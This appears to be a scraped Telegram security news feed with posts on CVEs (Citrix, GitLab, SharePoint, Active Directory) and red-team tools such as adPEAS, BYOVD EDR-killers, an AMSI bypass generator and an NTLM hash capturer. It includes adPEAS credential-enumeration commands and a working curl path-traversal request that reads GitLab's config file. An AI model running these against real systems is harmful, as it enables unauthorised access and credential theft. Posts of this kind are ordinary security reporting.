Критическая уязвимость в продуктах Citrix NetScaler ADC и NetScaler Gateway, которая позволяет атакующему, не прошедшему аутентификацию, обойти механизм проверки подлинности. Опасность в том, что устройства NetScaler часто располагаются на периметре сети и обеспечивают удалённый доступ, компрометация такого устройства открывает прямой путь во внутреннюю сеть
Unauthenticated session forgery on Citrix NetScaler ADC / NetScaler Gateway via the SAML HTTP-Redirect binding handler at GET /cgi/samlauth. CVSS 4.0 9.3, CWE-288. Bulletin CTX696939 (2026-08-19), no workarounds
Что делать:
Немедленно обновить все уязвимые устройства до версий 14.1-73.32 (для ветки 14.1) или 13.1-63.21 (для ветки 13.1)
#cve #poc #citrix
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Отличный инструмент для поиска и сбора информации в
Самый большой релиз с 2.0 версии: 5 новых проверок, 16 дополнений, 138 исправлений
Подробнее
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
#soft #powershell #ad #enumeration
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6❤3
Collects AWS IAM/authorization data and builds a BloodHound OpenGraph
Установка в BH CE:
Administration → Early Access Features and enable OpenGraph Extension Management if it is present and switched off
Administration → OpenGraph Management and upload schema/schema.json
Check the extension appears as AWS (AWSHound), namespace AWS, at the version you expect
Quick Upload, and upload graph.zip
File Ingest, and wait for ingest and analysis to finish
#awshound #bhce #aws
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝4
Критическая (CVSS 10.0) уязвимость в GitLab, которая позволяет неавторизованному пользователю читать произвольные файлы на сервере
Path traversal в API коммитов репозитория. В уязвимых версиях API не убирает последовательности обхода (например, ../ или их кодированные варианты), что позволяет выйти за пределы нужного каталога и добраться до файловой системы сервера
Уязвимы:
🐥 8.7 до 19.1.7 включительно🐥 19.2 до 19.2.5 включительно🐥 19.3 до 19.3.1 включительно
Ручная проверка:
curl -sk -X POST \
"https://gitlab.example.com/api/v4/projects/35/repository/commits/?file=&file.path=%2Fopt%2Fgitlab%2Fembedded%2Fservice%2Fgitlab-rails%2Fconfig%2Fgitlab.yml&file.size=1&Content-Type=application/x-www-form-urlencoded"
Уязвимый инстанс вернет примерно следующее:
{"message":"400 Bad request - Invalid parameter: invalid %-encoding (## GitLab settings\n gitlab:\n host: gitlab.example.com\n ... )"}Тестовая лаба:
services:
gitlab:
image: gitlab/gitlab-ce:19.3.1-ce.0
container_name: cve-2026-85706-gitlab
hostname: gitlab.lab
restart: "no"
shm_size: "256m"
ports:
- "127.0.0.1:8929:80" # web / API
- "127.0.0.1:2224:22" # ssh (optional)
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://127.0.0.1:8929'
gitlab_rails['initial_root_password'] = 'CVE-2026-85706-Lab!'
prometheus_monitoring['enable'] = false
gitlab_rails['log_level'] = 'info'
volumes:
- gitlab-config:/etc/gitlab
- gitlab-logs:/var/log/gitlab
- gitlab-data:/var/opt/gitlab
volumes:
gitlab-config:
gitlab-logs:
gitlab-data:
docker compose -f docker-compose.yml up -d
#cve #poc #gitlab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1
The premier cybersecurity event of the year returns to Mandalay Bay with a re-engineered, six-day program built to ignite innovation, push boundaries, and bring the global security community together like never before
#blackhat #blackhatusa
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Неправильная проверка JWT в SharePoint Server Subscription Edition приводит к произвольному входу в учетную запись
By leveraging CVE-2026-55040, a remote unauthenticated attacker can assume the identity of any SharePoint site user; the prerequisite is the attacker must know in advance the user they wish to identify as. This can be achieved in a number of ways, including via a user’s Active Directory (AD) Security ID (SID), or via a user’s AD User Principal Name (UPN)
#cve #poc #sharepoint #windows #jwt
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Коллекция PoC'ов, демонстрирующих, как уязвимые драйверы могут быть использованы для отключения AV/EDR
Техника, при которой атакующий использует легитимный драйвер с действительной цифровой подписью, содержащий известную уязвимость, для получения несанкционированного доступа к режиму ядра операционной системы
#BYOVD #drivers #windows #redteam #av #edr #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Whitehat Lab
В дополнение к посту про BYOVD
Kernel-mode process terminator using a signed BYOVD driver. Works on all Windows 10/11
The tool is a single self-contained executable. It installs the driver through the Service Control Manager, performs the kill, then stops and deletes the service, leaving no persistent artifact behind. Targets are configurable at runtime through a config file, command line, or the built-in defaults
#byovd #windows #rust #kernel
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Генератор AMSI bypass'ов
AMSI (Antimalware Scan Interface) is a Windows interface that allows applications and services to scan script content for malicious usage. If a signature is registered by the AMSI antimalware service provider (Windows Defender by default), it will be blocked
#amsi #bypass #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Forwarded from OffensiveMentor
NTLMv2 hash capture tool in pure Go zero deps, single static binary.
Poisons LLMNR / NBT-NS / mDNS and captures over SMB, HTTP, FTP, LDAP, MSSQL, Kerberos and more
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥2
Инструмент для работы через Chrome DevTools Protocol (CDP)
Beacon Object File (BOF) для активации CDP - CDP-Enable-BOF
It is built for penetration testing and red team workflows where you have access to a running browser's CDP endpoint and want to inspect browser state, collect artifacts, or browse through the user's browser context
#cdp #chrome #devtools #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - overgrowncarrot1/CVE-2026-49179-Active-Directory-WriteSPNScript-Command-Injection: CVE-2026-49179: Active Directory WriteSPNScript…
CVE-2026-49179: Active Directory WriteSPNScript Command Injection - overgrowncarrot1/CVE-2026-49179-Active-Directory-WriteSPNScript-Command-Injection
Компонент (
ntdsai.dll - WriteSPNScript function) Active Directory формирует команду на основе внешних данных, но не экранирует или некорректно экранирует специальные символы (8.8 по CVSS 3.1)Для эксплуатации подойдет любой аутентифицированный пользователь, как импакт RCE от системы на DC
Уязвимы:
Windows Server с 2012 по 2025
#cve #windows #ad #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
Forwarded from OFFZONE
Ловите все записи докладов во ВКонтакте:
Презентации тоже загрузили, они доступны на сайте программы. Чтобы скачать презентацию, нажмите на интересующий доклад.
Доклады на YouTube выложили, но пока частично. Оставшиеся догрузим в среду и напишем об этом.
Please open Telegram to view this post
VIEW IN TELEGRAM